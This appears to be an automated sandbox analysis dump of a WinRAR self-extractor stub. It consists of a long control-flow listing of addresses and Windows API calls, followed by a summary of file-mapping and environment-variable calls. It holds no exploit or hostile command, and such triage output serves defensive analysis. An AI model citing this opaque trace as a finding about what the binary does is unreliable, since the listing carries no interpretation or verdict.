24348 2ec194 EnableWindow 24341->24348 24342 2eba73 24459 2eac04 SetCurrentDirectoryW 24342->24459 24343 2eba68 GetLastError 24343->24342 24350 2de617 53 API calls 24344->24350 24352 2ec03b 24345->24352 24346->24333 24353 2ec1ba 24347->24353 24567 2d12d3 GetDlgItem EnableWindow 24347->24567 24348->24347 24349 2ebeed 24356 2de617 53 API calls 24349->24356 24354 2ec017 SetDlgItemTextW 24350->24354 24357 2ec04d 24352->24357 24391 2ec072 24352->24391 24360 2ec1e1 24353->24360 24375 2ec1d9 SendMessageW 24353->24375 24354->24336 24355 2eba87 24361 2eba90 GetLastError 24355->24361 24362 2eba9e 24355->24362 24356->24284 24565 2e9ed5 32 API calls 24357->24565 24358 2ec0cb 24366 2ec73f 97 API calls 24358->24366 24360->24284 24370 2de617 53 API calls 24360->24370 24361->24362 24367 2ebb11 24362->24367 24368 2ebaae GetTickCount 24362->24368 24369 2ebb20 24362->24369 24364 2ec1b0 24568 2d12d3 GetDlgItem EnableWindow 24364->24568 24365->24349 24371 2de617 53 API calls 24365->24371 24366->24386 24367->24369 24372 2ebd56 24367->24372 24377 2d4092 _swprintf 51 API calls 24368->24377 24380 2ebcfb 24369->24380 24381 2ebb39 GetModuleFileNameW 24369->24381 24382 2ebcf1 24369->24382 24378 2eb862 24370->24378 24379 2ebed0 24371->24379 24468 2d12f1 GetDlgItem ShowWindow 24372->24468 24373 2ec066 24373->24391 24375->24360 24385 2ebac7 24377->24385 24378->24284 24378->24323 24387 2d4092 _swprintf 51 API calls 24379->24387 24390 2de617 53 API calls 24380->24390 24559 2df28c 82 API calls 24381->24559 24382->24294 24382->24380 24383 2ec169 24566 2e9ed5 32 API calls 24383->24566 24384 2ebd66 24469 2d12f1 GetDlgItem ShowWindow 24384->24469 24460 2d966e 24385->24460 24386->24341 24386->24383 24393 2de617 53 API calls 24386->24393 24387->24349 24396 2ebd05 24390->24396 24391->24358 24397 2ec73f 97 API calls 24391->24397 24393->24386 24394 2ebb5f 24399 2d4092 _swprintf 51 API calls 24394->24399 24395 2ec188 24395->24341 24400 2d4092 _swprintf 51 API calls 24396->24400 24401 2ec0a0 24397->24401 
24398 2ebd70 24402 2de617 53 API calls 24398->24402 24404 2ebb81 CreateFileMappingW 24399->24404 24405 2ebd23 24400->24405 24401->24358 24406 2ec0a9 DialogBoxParamW 24401->24406 24407 2ebd7a SetDlgItemTextW 24402->24407 24409 2ebbe3 GetCommandLineW 24404->24409 24437 2ebc60 __InternalCxxFrameHandler 24404->24437 24417 2de617 53 API calls 24405->24417 24406->24294 24406->24358 24470 2d12f1 GetDlgItem ShowWindow 24407->24470 24408 2ebaed 24411 2ebaf4 GetLastError 24408->24411 24412 2ebaff 24408->24412 24413 2ebbf4 24409->24413 24411->24412 24415 2d959a 80 API calls 24412->24415 24560 2eb425 SHGetMalloc 24413->24560 24414 2ebd8c SetDlgItemTextW GetDlgItem 24418 2ebda9 GetWindowLongW SetWindowLongW 24414->24418 24419 2ebdc1 24414->24419 24415->24367 24421 2ebd3d 24417->24421 24418->24419 24471 2ec73f 24419->24471 24420 2ebc10 24561 2eb425 SHGetMalloc 24420->24561 24425 2ebc1c 24562 2eb425 SHGetMalloc 24425->24562 24426 2ec73f 97 API calls 24428 2ebddd 24426->24428 24496 2eda52 24428->24496 24429 2ebc28 24563 2df3fa 82 API calls 2 library calls 24429->24563 24430 2ebccb 24430->24382 24436 2ebce1 UnmapViewOfFile CloseHandle 24430->24436 24434 2ebc3f MapViewOfFile 24434->24437 24435 2ec73f 97 API calls 24441 2ebe03 24435->24441 24436->24382 24437->24430 24438 2ebcb7 Sleep 24437->24438 24438->24430 24438->24437 24439 2ebe2c 24564 2d12d3 GetDlgItem EnableWindow 24439->24564 24441->24439 24442 2ec73f 97 API calls 24441->24442 24442->24439 24444 2d131f 24443->24444 24445 2d1378 24443->24445 24447 2d1385 24444->24447 24569 2de2e8 62 API calls 2 library calls 24444->24569 24570 2de2c1 GetWindowLongW SetWindowLongW 24445->24570 24447->24281 24447->24282 24447->24284 24449 2d1341 24449->24447 24450 2d1354 GetDlgItem 24449->24450 24450->24447 24451 2d1364 24450->24451 24451->24447 24452 2d136a SetWindowTextW 24451->24452 24452->24447 24456 2da0bb 24453->24456 24454 2da14c 24455 2da2b2 8 API calls 24454->24455 24457 2da175 24454->24457 24455->24457 24456->24454 24456->24457 24571 
2da2b2 24456->24571 24457->24342 24457->24343 24459->24355 24461 2d9678 24460->24461 24462 2d96d5 CreateFileW 24461->24462 24463 2d96c9 24461->24463 24462->24463 24464 2d971f 24463->24464 24465 2dbb03 GetCurrentDirectoryW 24463->24465 24464->24408 24466 2d9704 24465->24466 24466->24464 24467 2d9708 CreateFileW 24466->24467 24467->24464 24468->24384 24469->24398 24470->24414 24472 2ec749 __EH_prolog 24471->24472 24473 2ebdcf 24472->24473 24603 2eb314 24472->24603 24473->24426 24476 2eb314 ExpandEnvironmentStringsW 24486 2ec780 _wcslen _wcsrchr 24476->24486 24477 2eca67 SetWindowTextW 24477->24486 24482 2ec855 SetFileAttributesW 24484 2ec90f GetFileAttributesW 24482->24484 24485 2ec86f __cftof _wcslen 24482->24485 24484->24486 24488 2ec921 DeleteFileW 24484->24488 24485->24484 24485->24486 24609 2db991 51 API calls 3 library calls 24485->24609 24486->24473 24486->24476 24486->24477 24486->24482 24489 2ecc31 GetDlgItem SetWindowTextW SendMessageW 24486->24489 24491 2ecc71 SendMessageW 24486->24491 24607 2e1fbb CompareStringW 24486->24607 24608 2ea64d GetCurrentDirectoryW 24486->24608 24610 2da5d1 6 API calls 24486->24610 24611 2da55a FindClose 24486->24611 24612 2eb48e 76 API calls 2 library calls 24486->24612 24613 2f3e3e 24486->24613 24488->24486 24493 2ec932 24488->24493 24489->24486 24490 2d4092 _swprintf 51 API calls 24492 2ec952 GetFileAttributesW 24490->24492 24491->24486 24492->24493 24494 2ec967 MoveFileW 24492->24494 24493->24490 24494->24486 24495 2ec97f MoveFileExW 24494->24495 24495->24486 24497 2eda5c __EH_prolog 24496->24497 24628 2e0659 24497->24628 24499 2eda8d 24632 2d5b3d 24499->24632 24501 2edaab 24636 2d7b0d 24501->24636 24505 2edafe 24652 2d7b9e 24505->24652 24507 2ebdee 24507->24435 24509 2ed6a8 24508->24509 24510 2ea5c6 4 API calls 24509->24510 24511 2ed6ad 24510->24511 24512 2ed6b5 GetWindow 24511->24512 24513 2ebf15 24511->24513 24512->24513 24516 2ed6d5 24512->24516 24513->24289 24513->24290 24514 2ed6e2 GetClassNameW 25133 2e1fbb 
CompareStringW 24514->25133 24516->24513 24516->24514 24517 2ed76a GetWindow 24516->24517 24518 2ed706 GetWindowLongW 24516->24518 24517->24513 24517->24516 24518->24517 24519 2ed716 SendMessageW 24518->24519 24519->24517 24520 2ed72c GetObjectW 24519->24520 25134 2ea605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24520->25134 24522 2ed743 25135 2ea5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24522->25135 25136 2ea80c 8 API calls 24522->25136 24525 2ed754 SendMessageW DeleteObject 24525->24517 24526->24305 24528 2eabcc 24527->24528 24529 2eabf1 24527->24529 25137 2e1fbb CompareStringW 24528->25137 24531 2eabff 24529->24531 24532 2eabf6 SHAutoComplete 24529->24532 24535 2eb093 24531->24535 24532->24531 24533 2eabdf 24533->24529 24534 2eabe3 FindWindowExW 24533->24534 24534->24529 24536 2eb09d __EH_prolog 24535->24536 24537 2d13dc 84 API calls 24536->24537 24538 2eb0bf 24537->24538 25138 2d1fdc 24538->25138 24541 2eb0eb 24544 2d19af 128 API calls 24541->24544 24542 2eb0d9 24543 2d1692 86 API calls 24542->24543 24545 2eb0e4 24543->24545 24547 2eb10d __InternalCxxFrameHandler ___std_exception_copy 24544->24547 24545->24331 24545->24335 24546 2d1692 86 API calls 24546->24545 24547->24546 24548->24378 25146 2eb568 PeekMessageW 24549->25146 24552 2ed536 SendMessageW SendMessageW 24554 2ed572 24552->24554 24555 2ed591 SendMessageW SendMessageW SendMessageW 24552->24555 24553 2ed502 24558 2ed50d ShowWindow SendMessageW SendMessageW 24553->24558 24554->24555 24556 2ed5e7 SendMessageW 24555->24556 24557 2ed5c4 SendMessageW 24555->24557 24556->24333 24557->24556 24558->24552 24559->24394 24560->24420 24561->24425 24562->24429 24563->24434 24564->24300 24565->24373 24566->24395 24567->24364 24568->24353 24569->24449 24570->24447 24572 2da2bf 24571->24572 24573 2da2e3 24572->24573 24574 2da2d6 CreateDirectoryW 24572->24574 24592 2da231 24573->24592 24574->24573 24576 2da316 24574->24576 24579 2da325 24576->24579 24584 2da4ed 24576->24584 24578 2da329 GetLastError 24578->24579 
24579->24456 24580 2dbb03 GetCurrentDirectoryW 24582 2da2ff 24580->24582 24582->24578 24583 2da303 CreateDirectoryW 24582->24583 24583->24576 24583->24578 24585 2eec50 24584->24585 24586 2da4fa SetFileAttributesW 24585->24586 24587 2da53d 24586->24587 24588 2da510 24586->24588 24587->24579 24589 2dbb03 GetCurrentDirectoryW 24588->24589 24590 2da524 24589->24590 24590->24587 24591 2da528 SetFileAttributesW 24590->24591 24591->24587 24595 2da243 24592->24595 24596 2eec50 24595->24596 24597 2da250 GetFileAttributesW 24596->24597 24598 2da23a 24597->24598 24599 2da261 24597->24599 24598->24578 24598->24580 24600 2dbb03 GetCurrentDirectoryW 24599->24600 24601 2da275 24600->24601 24601->24598 24602 2da279 GetFileAttributesW 24601->24602 24602->24598 24604 2eb31e 24603->24604 24605 2eb40d 24604->24605 24606 2eb3f0 ExpandEnvironmentStringsW 24604->24606 24605->24486 24606->24605 24607->24486 24608->24486 24609->24485 24610->24486 24611->24486 24612->24486 24614 2f8e54 24613->24614 24615 2f8e6c 24614->24615 24616 2f8e61 24614->24616 24618 2f8e74 24615->24618 24625 2f8e7d _abort 24615->24625 24617 2f8e06 __vswprintf_c_l 21 API calls 24616->24617 24623 2f8e69 24617->24623 24619 2f8dcc _free 20 API calls 24618->24619 24619->24623 24620 2f8ea7 HeapReAlloc 24620->24623 24620->24625 24621 2f8e82 24626 2f91a8 20 API calls __dosmaperr 24621->24626 24623->24486 24625->24620 24625->24621 24627 2f7a5e 7 API calls 2 library calls 24625->24627 24626->24623 24627->24625 24629 2e0666 _wcslen 24628->24629 24656 2d17e9 24629->24656 24631 2e067e 24631->24499 24633 2e0659 _wcslen 24632->24633 24634 2d17e9 78 API calls 24633->24634 24635 2e067e 24634->24635 24635->24501 24637 2d7b17 __EH_prolog 24636->24637 24673 2dce40 24637->24673 24639 2d7b32 24640 2eeb38 8 API calls 24639->24640 24641 2d7b5c 24640->24641 24679 2e4a76 24641->24679 24644 2d7c7d 24645 2d7c87 24644->24645 24647 2d7cf1 24645->24647 24708 2da56d 24645->24708 24650 2d7d50 24647->24650 24686 2d8284 24647->24686 24648 2d7d92 
24648->24505 24650->24648 24714 2d138b 74 API calls 24650->24714 24653 2d7bac 24652->24653 24655 2d7bb3 24652->24655 24654 2e2297 86 API calls 24653->24654 24654->24655 24657 2d17ff 24656->24657 24668 2d185a __InternalCxxFrameHandler 24656->24668 24658 2d1828 24657->24658 24669 2d6c36 76 API calls __vswprintf_c_l 24657->24669 24660 2d1887 24658->24660 24665 2d1847 ___std_exception_copy 24658->24665 24662 2f3e3e 22 API calls 24660->24662 24661 2d181e 24670 2d6ca7 75 API calls 24661->24670 24664 2d188e 24662->24664 24664->24668 24672 2d6ca7 75 API calls 24664->24672 24665->24668 24671 2d6ca7 75 API calls 24665->24671 24668->24631 24669->24661 24670->24658 24671->24668 24672->24668 24674 2dce4a __EH_prolog 24673->24674 24675 2eeb38 8 API calls 24674->24675 24676 2dce8d 24675->24676 24677 2eeb38 8 API calls 24676->24677 24678 2dceb1 24677->24678 24678->24639 24680 2e4a80 __EH_prolog 24679->24680 24681 2eeb38 8 API calls 24680->24681 24682 2e4a9c 24681->24682 24683 2d7b8b 24682->24683 24685 2e0e46 80 API calls 24682->24685 24683->24644 24685->24683 24687 2d828e __EH_prolog 24686->24687 24715 2d13dc 24687->24715 24689 2d82aa 24690 2d82bb 24689->24690 24858 2d9f42 24689->24858 24694 2d82f2 24690->24694 24723 2d1a04 24690->24723 24854 2d1692 24694->24854 24696 2d8389 24742 2d8430 24696->24742 24700 2d83e8 24750 2d1f6d 24700->24750 24703 2d83f3 24703->24694 24754 2d3b2d 24703->24754 24766 2d848e 24703->24766 24705 2da56d 7 API calls 24706 2d82ee 24705->24706 24706->24694 24706->24696 24706->24705 24862 2dc0c5 CompareStringW _wcslen 24706->24862 24709 2da582 24708->24709 24713 2da5b0 24709->24713 25122 2da69b 24709->25122 24711 2da592 24712 2da597 FindClose 24711->24712 24711->24713 24712->24713 24713->24645 24714->24648 24716 2d13e1 __EH_prolog 24715->24716 24717 2dce40 8 API calls 24716->24717 24718 2d1419 24717->24718 24719 2eeb38 8 API calls 24718->24719 24722 2d1474 __cftof 24718->24722 24720 2d1461 24719->24720 24720->24722 24863 2db505 24720->24863 24722->24689 24724 
2d1a0e __EH_prolog 24723->24724 24736 2d1a61 24724->24736 24739 2d1b9b 24724->24739 24879 2d13ba 24724->24879 24727 2d1bc7 24882 2d138b 74 API calls 24727->24882 24729 2d3b2d 101 API calls 24732 2d1c12 24729->24732 24730 2d1bd4 24730->24729 24730->24739 24731 2d1c5a 24735 2d1c8d 24731->24735 24731->24739 24883 2d138b 74 API calls 24731->24883 24732->24731 24734 2d3b2d 101 API calls 24732->24734 24734->24732 24735->24739 24740 2d9e80 79 API calls 24735->24740 24736->24727 24736->24730 24736->24739 24737 2d3b2d 101 API calls 24738 2d1cde 24737->24738 24738->24737 24738->24739 24739->24706 24740->24738 24741 2d9e80 79 API calls 24741->24736 24901 2dcf3d 24742->24901 24744 2d8440 24905 2e13d2 GetSystemTime SystemTimeToFileTime 24744->24905 24746 2d83a3 24746->24700 24747 2e1b66 24746->24747 24910 2ede6b 24747->24910 24751 2d1f72 __EH_prolog 24750->24751 24753 2d1fa6 24751->24753 24918 2d19af 24751->24918 24753->24703 24755 2d3b3d 24754->24755 24756 2d3b39 24754->24756 24765 2d9e80 79 API calls 24755->24765 24756->24703 24757 2d3b4f 24758 2d3b78 24757->24758 24759 2d3b6a 24757->24759 25049 2d286b 101 API calls 3 library calls 24758->25049 24760 2d3baa 24759->24760 25048 2d32f7 89 API calls 2 library calls 24759->25048 24760->24703 24763 2d3b76 24763->24760 25050 2d20d7 74 API calls 24763->25050 24765->24757 24767 2d8498 __EH_prolog 24766->24767 24770 2d84d5 24767->24770 24777 2d8513 24767->24777 25075 2e8c8d 103 API calls 24767->25075 24769 2d84f5 24771 2d851c 24769->24771 24772 2d84fa 24769->24772 24770->24769 24775 2d857a 24770->24775 24770->24777 24771->24777 25077 2e8c8d 103 API calls 24771->25077 24772->24777 25076 2d7a0d 152 API calls 24772->25076 24775->24777 25051 2d5d1a 24775->25051 24777->24703 24778 2d8605 24778->24777 25057 2d8167 24778->25057 24780 2d8797 24782 2da56d 7 API calls 24780->24782 24783 2d8802 24780->24783 24782->24783 25063 2d7c0d 24783->25063 24785 2dd051 82 API calls 24791 2d885d 24785->24791 24786 2d898b 25080 2d2021 74 API calls 
24786->25080 24787 2d8992 24788 2d8a5f 24787->24788 24794 2d89e1 24787->24794 24792 2d8ab6 24788->24792 24807 2d8a6a 24788->24807 24791->24777 24791->24785 24791->24786 24791->24787 25078 2d8117 84 API calls 24791->25078 25079 2d2021 74 API calls 24791->25079 24799 2d8a4c 24792->24799 25083 2d7fc0 97 API calls 24792->25083 24793 2d8ab4 24800 2d959a 80 API calls 24793->24800 24796 2d8b14 24794->24796 24794->24799 24801 2da231 3 API calls 24794->24801 24795 2d9105 24798 2d959a 80 API calls 24795->24798 24796->24795 24797 2d8b82 24796->24797 25084 2d98bc 24796->25084 24805 2dab1a 8 API calls 24797->24805 24798->24777 24799->24793 24799->24796 24800->24777 24803 2d8a19 24801->24803 24803->24799 25081 2d92a3 97 API calls 24803->25081 24808 2d8bd1 24805->24808 24807->24793 25082 2d7db2 101 API calls 24807->25082 24810 2dab1a 8 API calls 24808->24810 24825 2d8be7 24810->24825 24813 2d8b70 25088 2d6e98 77 API calls 24813->25088 24815 2d8cbc 24816 2d8d18 24815->24816 24817 2d8e40 24815->24817 24818 2d8d8a 24816->24818 24819 2d8d28 24816->24819 24820 2d8e66 24817->24820 24821 2d8e52 24817->24821 24840 2d8d49 24817->24840 24826 2d8167 19 API calls 24818->24826 24822 2d8d6e 24819->24822 24830 2d8d37 24819->24830 24824 2e3377 75 API calls 24820->24824 24823 2d9215 123 API calls 24821->24823 24822->24840 25091 2d77b8 111 API calls 24822->25091 24823->24840 24827 2d8e7f 24824->24827 24825->24815 24828 2d8c93 24825->24828 24835 2d981a 79 API calls 24825->24835 24829 2d8dbd 24826->24829 25094 2e3020 123 API calls 24827->25094 24828->24815 25089 2d9a3c 82 API calls 24828->25089 24836 2d8df5 24829->24836 24837 2d8de6 24829->24837 24829->24840 25090 2d2021 74 API calls 24830->25090 24835->24828 25093 2d9155 93 API calls __EH_prolog 24836->25093 25092 2d7542 85 API calls 24837->25092 24843 2d8f85 24840->24843 25095 2d2021 74 API calls 24840->25095 24842 2d9090 24842->24795 24844 2da4ed 3 API calls 24842->24844 24843->24795 24843->24842 24845 2d903e 24843->24845 25069 2d9f09 
SetEndOfFile 24843->25069 24848 2d90eb 24844->24848 25070 2d9da2 24845->25070 24848->24795 25096 2d2021 74 API calls 24848->25096 24849 2d9085 24851 2d9620 77 API calls 24849->24851 24851->24842 24852 2d90fb 25097 2d6dcb 76 API calls _wcschr 24852->25097 24855 2d16a4 24854->24855 25113 2dcee1 24855->25113 24859 2d9f59 24858->24859 24860 2d9f63 24859->24860 25121 2d6d0c 78 API calls 24859->25121 24860->24690 24862->24706 24864 2db50f __EH_prolog 24863->24864 24869 2df1d0 82 API calls 24864->24869 24866 2db521 24870 2db61e 24866->24870 24869->24866 24871 2db630 __cftof 24870->24871 24874 2e10dc 24871->24874 24877 2e109e GetCurrentProcess GetProcessAffinityMask 24874->24877 24878 2db597 24877->24878 24878->24722 24884 2d1732 24879->24884 24881 2d13d6 24881->24741 24882->24739 24883->24735 24885 2d1748 24884->24885 24896 2d17a0 __InternalCxxFrameHandler 24884->24896 24886 2d1771 24885->24886 24897 2d6c36 76 API calls __vswprintf_c_l 24885->24897 24887 2d17c7 24886->24887 24890 2d178d ___std_exception_copy 24886->24890 24889 2f3e3e 22 API calls 24887->24889 24892 2d17ce 24889->24892 24890->24896 24899 2d6ca7 75 API calls 24890->24899 24891 2d1767 24898 2d6ca7 75 API calls 24891->24898 24892->24896 24900 2d6ca7 75 API calls 24892->24900 24896->24881 24897->24891 24898->24886 24899->24896 24900->24896 24902 2dcf4d 24901->24902 24904 2dcf54 24901->24904 24906 2d981a 24902->24906 24904->24744 24905->24746 24907 2d9833 24906->24907 24909 2d9e80 79 API calls 24907->24909 24908 2d9865 24908->24904 24909->24908 24911 2ede78 24910->24911 24912 2de617 53 API calls 24911->24912 24913 2ede9b 24912->24913 24914 2d4092 _swprintf 51 API calls 24913->24914 24915 2edead 24914->24915 24916 2ed4d4 16 API calls 24915->24916 24917 2e1b7c 24916->24917 24917->24700 24919 2d19bf 24918->24919 24921 2d19bb 24918->24921 24922 2d18f6 24919->24922 24921->24753 24923 2d1908 24922->24923 24924 2d1945 24922->24924 24925 2d3b2d 101 API calls 24923->24925 24930 2d3fa3 24924->24930 24928 2d1928 
24925->24928 24928->24921 24934 2d3fac 24930->24934 24931 2d3b2d 101 API calls 24931->24934 24932 2d1966 24932->24928 24935 2d1e50 24932->24935 24934->24931 24934->24932 24947 2e0e08 24934->24947 24936 2d1e5a __EH_prolog 24935->24936 24955 2d3bba 24936->24955 24938 2d1e84 24939 2d1732 78 API calls 24938->24939 24942 2d1f0b 24938->24942 24940 2d1e9b 24939->24940 24983 2d18a9 78 API calls 24940->24983 24942->24928 24943 2d1eb3 24945 2d1ebf _wcslen 24943->24945 24984 2e1b84 MultiByteToWideChar 24943->24984 24985 2d18a9 78 API calls 24945->24985 24948 2e0e0f 24947->24948 24949 2e0e2a 24948->24949 24953 2d6c31 RaiseException CallUnexpected 24948->24953 24951 2e0e3b SetThreadExecutionState 24949->24951 24954 2d6c31 RaiseException CallUnexpected 24949->24954 24951->24934 24953->24949 24954->24951 24956 2d3bc4 __EH_prolog 24955->24956 24957 2d3bda 24956->24957 24958 2d3bf6 24956->24958 25011 2d138b 74 API calls 24957->25011 24959 2d3e51 24958->24959 24963 2d3c22 24958->24963 25028 2d138b 74 API calls 24959->25028 24962 2d3be5 24962->24938 24963->24962 24986 2e3377 24963->24986 24965 2d3ca3 24966 2d3d2e 24965->24966 24982 2d3c9a 24965->24982 25014 2dd051 24965->25014 24996 2dab1a 24966->24996 24967 2d3c9f 24967->24965 25013 2d20bd 78 API calls 24967->25013 24969 2d3c8f 25012 2d138b 74 API calls 24969->25012 24970 2d3c71 24970->24965 24970->24967 24970->24969 24975 2d3d41 24976 2d3dd7 24975->24976 24977 2d3dc7 24975->24977 25020 2e3020 123 API calls 24976->25020 25000 2d9215 24977->25000 24980 2d3dd5 24980->24982 25021 2d2021 74 API calls 24980->25021 25022 2e2297 24982->25022 24983->24943 24984->24945 24985->24942 24987 2e338c 24986->24987 24989 2e3396 ___std_exception_copy 24986->24989 25029 2d6ca7 75 API calls 24987->25029 24990 2e341c 24989->24990 24991 2e34c6 24989->24991 24992 2e3440 __cftof 24989->24992 25030 2e32aa 75 API calls 3 library calls 24990->25030 25031 2f238d RaiseException 24991->25031 24992->24970 24995 2e34f2 24997 2dab28 24996->24997 24999 2dab32 
24996->24999 24998 2eeb38 8 API calls 24997->24998 24998->24999 24999->24975 25001 2d921f __EH_prolog 25000->25001 25032 2d7c64 25001->25032 25004 2d13ba 78 API calls 25005 2d9231 25004->25005 25035 2dd114 25005->25035 25007 2d928a 25007->24980 25009 2dd114 118 API calls 25010 2d9243 25009->25010 25010->25007 25010->25009 25044 2dd300 97 API calls __InternalCxxFrameHandler 25010->25044 25011->24962 25012->24982 25013->24965 25015 2dd084 25014->25015 25016 2dd072 25014->25016 25046 2d603a 82 API calls 25015->25046 25045 2d603a 82 API calls 25016->25045 25019 2dd07c 25019->24966 25020->24980 25021->24982 25025 2e22a1 25022->25025 25023 2e22ce 25024 2e22ba 25047 2e0eed 86 API calls 25024->25047 25025->25023 25025->25024 25027 2e22c1 25027->25023 25028->24962 25029->24989 25030->24992 25031->24995 25033 2db146 GetVersionExW 25032->25033 25034 2d7c69 25033->25034 25034->25004 25041 2dd12a __InternalCxxFrameHandler 25035->25041 25036 2dd29a 25037 2dd2ce 25036->25037 25038 2dd0cb 6 API calls 25036->25038 25039 2e0e08 SetThreadExecutionState RaiseException 25037->25039 25038->25037 25042 2dd291 25039->25042 25040 2e8c8d 103 API calls 25040->25041 25041->25036 25041->25040 25041->25042 25043 2dac05 91 API calls 25041->25043 25042->25010 25043->25041 25044->25010 25045->25019 25046->25019 25047->25027 25048->24763 25049->24763 25050->24760 25052 2d5d2a 25051->25052 25098 2d5c4b 25052->25098 25054 2d5d5d 25056 2d5d95 25054->25056 25103 2db1dc CharUpperW CompareStringW _wcslen ___vcrt_FlsGetValue 25054->25103 25056->24778 25058 2d8186 25057->25058 25059 2d8232 25058->25059 25110 2dbe5e 19 API calls __InternalCxxFrameHandler 25058->25110 25109 2e1fac CharUpperW 25059->25109 25062 2d823b 25062->24780 25064 2d7c22 25063->25064 25065 2d7c5a 25064->25065 25111 2d6e7a 74 API calls 25064->25111 25065->24791 25067 2d7c52 25112 2d138b 74 API calls 25067->25112 25069->24845 25071 2d9db3 25070->25071 25074 2d9dc2 25070->25074 25072 2d9db9 FlushFileBuffers 25071->25072 25071->25074 
25072->25074 25073 2d9e3f SetFileTime 25073->24849 25074->25073 25075->24770 25076->24777 25077->24777 25078->24791 25079->24791 25080->24787 25081->24799 25082->24793 25083->24799 25085 2d98c5 GetFileType 25084->25085 25086 2d8b5a 25084->25086 25085->25086 25086->24797 25087 2d2021 74 API calls 25086->25087 25087->24813 25088->24797 25089->24815 25090->24840 25091->24840 25092->24840 25093->24840 25094->24840 25095->24843 25096->24852 25097->24795 25104 2d5b48 25098->25104 25101 2d5c6c 25101->25054 25102 2d5b48 2 API calls 25102->25101 25103->25054 25106 2d5b52 25104->25106 25105 2d5c3a 25105->25101 25105->25102 25106->25105 25108 2db1dc CharUpperW CompareStringW _wcslen ___vcrt_FlsGetValue 25106->25108 25108->25106 25109->25062 25110->25059 25111->25067 25112->25065 25117 2dcef2 25113->25117 25115 2dcf24 25120 2da99e 86 API calls 25115->25120 25119 2da99e 86 API calls 25117->25119 25118 2dcf2f 25119->25115 25120->25118 25121->24860 25123 2da6a8 25122->25123 25124 2da727 FindNextFileW 25123->25124 25125 2da6c1 FindFirstFileW 25123->25125 25126 2da732 GetLastError 25124->25126 25132 2da709 25124->25132 25127 2da6d0 25125->25127 25125->25132 25126->25132 25128 2dbb03 GetCurrentDirectoryW 25127->25128 25129 2da6e0 25128->25129 25130 2da6fe GetLastError 25129->25130 25131 2da6e4 FindFirstFileW 25129->25131 25130->25132 25131->25130 25131->25132 25132->24711 25133->24516 25134->24522 25135->24522 25136->24525 25137->24533 25139 2d9f42 78 API calls 25138->25139 25140 2d1fe8 25139->25140 25141 2d1a04 101 API calls 25140->25141 25144 2d2005 25140->25144 25142 2d1ff5 25141->25142 25142->25144 25145 2d138b 74 API calls 25142->25145 25144->24541 25144->24542 25145->25144 25147 2eb5bc GetDlgItem 25146->25147 25148 2eb583 GetMessageW 25146->25148 25147->24552 25147->24553 25149 2eb5a8 TranslateMessage DispatchMessageW 25148->25149 25150 2eb599 IsDialogMessageW 25148->25150 25149->25147 25150->25147 25150->25149 25325 2e94e0 GetClientRect 25351 2e21e0 26 API calls 
std::bad_exception::bad_exception 25365 2ef2e0 46 API calls __RTC_Initialize 25366 2fbee0 GetCommandLineA GetCommandLineW 25326 2f2cfb 38 API calls 4 library calls 25352 2d95f0 80 API calls 25367 2d5ef0 82 API calls 25174 2f98f0 25182 2fadaf 25174->25182 25177 2f9904 25179 2f990c 25180 2f9919 25179->25180 25190 2f9920 11 API calls 25179->25190 25183 2fac98 _abort 5 API calls 25182->25183 25184 2fadd6 25183->25184 25185 2fadee TlsAlloc 25184->25185 25188 2faddf 25184->25188 25185->25188 25186 2efbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25187 2f98fa 25186->25187 25187->25177 25189 2f9869 20 API calls 2 library calls 25187->25189 25188->25186 25189->25179 25190->25177 25191 2fabf0 25192 2fabfb 25191->25192 25193 2faf0a 11 API calls 25192->25193 25194 2fac24 25192->25194 25195 2fac20 25192->25195 25193->25192 25197 2fac50 DeleteCriticalSection 25194->25197 25197->25195 25328 2f88f0 7 API calls ___scrt_uninitialize_crt 25354 2efd4f 9 API calls 2 library calls 25390 302bd0 VariantClear 25369 2e62ca 123 API calls __InternalCxxFrameHandler 25205 2edec2 25206 2edecf 25205->25206 25207 2de617 53 API calls 25206->25207 25208 2ededc 25207->25208 25209 2d4092 _swprintf 51 API calls 25208->25209 25210 2edef1 SetDlgItemTextW 25209->25210 25211 2eb568 5 API calls 25210->25211 25212 2edf0e 25211->25212 25355 2eb5c0 100 API calls 25392 2e77c0 118 API calls 25393 2effc0 RaiseException _com_error::_com_error CallUnexpected 25370 2f0ada 51 API calls 2 library calls 25276 2d10d5 25281 2d5abd 25276->25281 25282 2d5ac7 __EH_prolog 25281->25282 25283 2db505 84 API calls 25282->25283 25284 2d5ad3 25283->25284 25288 2d5cac GetCurrentProcess GetProcessAffinityMask 25284->25288 25289 2ee2d7 25290 2ee1db 25289->25290 25291 2ee85d ___delayLoadHelper2@8 14 API calls 25290->25291 25291->25290 25330 2ef4d3 20 API calls 25294 2ee1d1 14 API calls ___delayLoadHelper2@8 25394 2fa3d0 21 API calls 2 library calls

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 002E0863: GetModuleHandleW.KERNEL32(kernel32), ref: 002E087C
                                          • Part of subcall function 002E0863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 002E088E
                                          • Part of subcall function 002E0863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 002E08BF
                                          • Part of subcall function 002EA64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 002EA655
                                          • Part of subcall function 002EAC16: OleInitialize.OLE32(00000000), ref: 002EAC2F
                                          • Part of subcall function 002EAC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 002EAC66
                                          • Part of subcall function 002EAC16: SHGetMalloc.SHELL32(00318438), ref: 002EAC70
                                        • GetCommandLineW.KERNEL32 ref: 002EDF5C
                                        • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 002EDF83
                                        • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 002EDF94
                                        • UnmapViewOfFile.KERNEL32(00000000), ref: 002EDFCE
                                          • Part of subcall function 002EDBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 002EDBF4
                                          • Part of subcall function 002EDBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 002EDC30
                                        • CloseHandle.KERNEL32(00000000), ref: 002EDFD7
                                        • GetModuleFileNameW.KERNEL32(00000000,0032EC90,00000800), ref: 002EDFF2
                                        • SetEnvironmentVariableW.KERNEL32(sfxname,0032EC90), ref: 002EDFFE
                                        • GetLocalTime.KERNEL32(?), ref: 002EE009
                                        • _swprintf.LIBCMT ref: 002EE048
